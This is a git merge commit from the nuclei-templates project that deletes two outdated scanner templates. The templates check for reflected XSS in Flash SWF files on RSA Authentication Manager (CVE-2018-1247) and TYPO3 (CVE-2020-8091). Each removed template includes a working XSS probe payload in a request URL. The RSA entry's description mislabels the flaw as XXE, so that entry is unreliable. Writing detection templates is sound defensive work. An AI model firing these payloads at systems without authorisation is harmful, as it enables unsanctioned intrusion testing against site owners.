Merge pull request #2724 from projectdiscovery/cleanups

outdated template cleanups
2021-09-21 14:35:01 +05:30 · 2021-09-21 14:35:01 +05:30 · d7d3da49d9
parent 104fd0d37f 7b23f4ebd4
commit d7d3da49d9
2 changed files with 0 additions and 73 deletions
--- a/cves/2018/CVE-2018-1247.yaml
+++ b/cves/2018/CVE-2018-1247.yaml
@ -1,39 +0,0 @@
-id: CVE-2018-1247
-
-info:
-  name: RSA Authentication Manager XSS
-  author: madrobot
-  severity: high
-  tags: cve,cve2018,xss,flash
-  classification:
-    cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H
-    cvss-score: 7.10
-    cve-id: CVE-2018-1247
-    cwe-id: CWE-611
-  description: "RSA Authentication Manager Security Console, version 8.3 and earlier, contains a XML External Entity (XXE) vulnerability. This could potentially allow admin users to cause a denial of service or extract server data via injecting a maliciously crafted DTD in an XML file submitted to the application."
-  reference:
-    - http://seclists.org/fulldisclosure/2018/May/18
-    - http://www.securitytracker.com/id/1040835
-    - http://www.securityfocus.com/bid/104107
-    - https://www.exploit-db.com/exploits/44634/
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "application/x-shockwave-flash"
-        part: header
-
-      - type: word
-        words:
-          - "javascript:alert(1337)"
-        part: body
-
-      - type: status
-        status:
-          - 200
--- a/cves/2020/CVE-2020-8091.yaml
+++ b/cves/2020/CVE-2020-8091.yaml
@ -1,34 +0,0 @@
-id: CVE-2020-8091
-
-info:
-  name: TYPO3 Cross-Site Scripting Vulnerability
-  author: dwisiswant0
-  severity: medium
-  description: svg.swf in TYPO3 6.2.0 to 6.2.38 ELTS and 7.0.0 to 7.1.0 could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack on a targeted system. This may be at a contrib/websvg/svg.swf pathname.
-  tags: cve,cve2020,xss
-  reference:
-    - https://typo3.org/security/advisory/typo3-psa-2019-003/
-    - https://www.purplemet.com/blog/typo3-xss-vulnerability
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.10
-    cve-id: CVE-2020-8091
-    cwe-id: CWE-79
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(31337),this.x=1}//"
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        words:
-          - "31337"
-        part: body
-      - type: word
-        words:
-          - "application/x-shockwave-flash"
-        part: header